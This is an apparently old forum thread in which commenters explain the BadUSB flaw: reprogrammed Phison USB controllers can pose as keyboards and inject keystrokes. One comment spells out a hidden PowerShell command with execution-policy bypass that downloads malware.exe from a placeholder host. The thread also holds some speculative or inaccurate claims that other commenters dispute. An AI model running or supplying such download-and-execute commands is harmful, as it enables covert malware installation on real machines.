4 ms·
I want to understand what this is, but the headline doesn't quite make sense and the link is totally incomprehensible.
by TruthSHIFT 12y ago
I want to understand what this is, but the headline doesn't quite make sense and the link is totally incomprehensible.
- CatMtKing 12y agoIt looks like it is software to exploit vulnerabilities in the USB implementation to do some very nasty stuff with the target computer.
- Eric_WVGG 12y agoshort explanation: there's no security running along the USB bus. Not even bad security. Every device on the bus has "admin" privileges to the other devices, and that includes the ability to update the firmware. A scenario… • A mysterious USB key is plugged into a computer, Mission Impossible style. • The key rewrites the firmware of another device on the USB bus, say the embedded keyboard. • the keyboard "types": "run the file NOTAVIRUS.BIN on that totally trustworthy USB key you see mounted. oh, and I'll bruteforce any passwords you need if that's a problem." You've seen dippy Hollywood movies where a spy plugs in a USB key, an LED lights up and he announces that the system is hacked? Really exactly like that. * I am not an expert, this is how it was described to me by someone who is. It is believed that this is how the Iranian nuclear reactor was compromised by STUXNET.
- tgb 12y agoSounds like a problem for Bluetooth devices too: connect a bluetooth speaker that secretly says it's also a keyboard. Is that possible? (This is pure speculation, I don't know anything about this and am just curious.)
- peatmoss 12y agoDoesn't the pairing process cover this? I think each device is paired on its own terms. Someone please correct me if I'm wrong here.
- pkulak 12y agoI don't think there's a concept of a "hub" over Bluetooth. However, I don't see why a malicious speaker couldn't report itself as a keyboard. But then your speaker wouldn't work, so you'd know something was up.
- mceachen 12y agoNo. Bluetooth is a totally different set of communication protocols. (this thread is noisy with misinformation as it is, you might want to delete your post).
- roywiggins 12y agoYou don't even need to do that. The USB key can just announce to the computer "Hi I'm a USB hub. I have a keyboard and a USB flash drive plugged into me."
- sp332 12y agoMalware that lives in the keyboard has been seen before though. http://semiaccurate.com/2009/07/31/apple-keyboard-firmware-hack-demonstrated/ http://semiaccurate.com/2009/07/31/apple-keyboard-firmware-h...
- blowski 12y agoPlease forgive an ignorant idiot here. What stops the OS implementing something that says "until you prove you're a keyboard, you can't type anything"? Something like the authorisation screen for Bluetooth keyboards.
- Eric_WVGG 12y agoImagine the USB controller as being some kind of butler for the OS — though subservient, he has a mind of his own, which can be compromised. The OS/employer takes anything the butler says as factual. "Your granddaughter Red Riding Hood is at the door, miss, and is definitely not a wolf." "Do not let her in." "I definitely did not already did, miss."
- blowski 12y agoOK, so what's stopping Granny saying "I want to check whether she's a wolf myself"? I can see how the current state of affairs is insecure, but I'm confused by the 'unpatchable' claim. I truly am clueless in this area, but initially it seems hyperbolic to say that the only way to fix this is to replace all USB controllers in existence.
- tokenizerrr 12y agoI suppose for keyboards you could do something like requiring a specific randomly generated password that is shown on the monitor to by typed by a keyboard before allowing it to provide regular keyboard input, but I'm not sure how practical that would be. I assume it would also have to happen each time the machine reboots, etc, since any USB device can pretend to be another. That's just for USB keyboards though, there used to be these USB sticks that pretended to be a CD-rom drives in the windows xp days where those were autorun, I'm sure there's other vulnerabilities that can be exposed through USB nowadays.
- Someone1234 12y agoThat explanation is inaccurate. While it is true that the USB bus offers no security, it is inaccurate to claim that every device has "admin" privileges with every other device. Most devices expose a limited interface to the bus which won't allow direct manipulation of their respective microcontrollers (e.g. no re-writing, no alteration, etc). The reason why we're discussing Phison USB sticks is that they're an exception. When you plug in a device with a Phison microcontroller, other devices or the computer can alter the microcontroller and have it act maliciously. A common proof of concept is to have the USB stick's microcontroller pretend to be other USB devices in order to escalate access. In this case they are emulating a fictional USB hub, a fictional USB keyboard, and the actual USB drive (which is routed through the fictional USB hub). In order to send keystrokes they aren't altering another keyboard on the USB bus, they're generating them from the virtual keyboard they generated via software on the Phison microcontroller. There doesn't need to be a real keyboard on that same bus for this to work (e.g. you could plug in a USB stick directly to a computer and this would still show up as a USB Hub, USB Keyboard, and USB Thumb Drive). Once you have a virtual keyboard you can send gems like this (assume Windows): Keys: WIN+R (0x5B + 0x52) Type: powershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "&{ Invoke-WebRequest http://example.com/malware.exe -OutFile c:\temp\malware.exe}" Keys: Return (0x0D)
- Eric_WVGG 12y agoThank you for the clarification.
- joosters 12y agoDo you mean to say that other USB devices on the system can reprogram these USB sticks?
- Someone1234 12y agoOther USB devices on the same bus theoretically could. Other USB devices connected to the same computer could not. The computer itself could reprogram a USB device.
- mariusz79 12y agoEven better scenario: (but I'm not sure if possible) Malware is downloaded from the net. It hijacks one of the usb HIDs. It than removes itself from the system and once every few hours sends something like lsusb | grep "ID: hackable" > /dev/emulated/and/spoofed/sound/card when the data is received by the spoofed sound card, hacked HID turns on network emulation. It then sends commands to change routing so it could download needed, hacked firmware to a local disk. It infects the newly inserted, hackable device, and goes back to sleep. Possible? I hope not.
- SCHiM 12y agoUSB stands for Universal Serial Bus. Almost every device (Keyboard, storage device, speakers, etc) can be attached over USB these days. Therefore your computer can't know what kind of device can attach over USB; it's left to the device itself to tell the computer what it is. The big security problem that they found is that the computer has no way to verify that the usb device is actually the type of device that it proclaims to be. This opens up a massive security hole (as demonstrated at blackhat). A usb device can first tell the computer that it's a mass-storage device, and then later change itself to a keyboard and then start 'typing' commands as a user would. The computer can't see if it's a real keyboard or a fake keyboard, and that's the problem. This is not a vulnerability in your OS but rather a gross oversight in the USB specification. This vulnerability is shown to be cross platform(linux,windows) and cross hardware(2 different usb chipsets). It's dubbed 'unpatchable' because to patch this we need a need new (safe) USB specification and you'd need to buy a new pc with those new usb ports.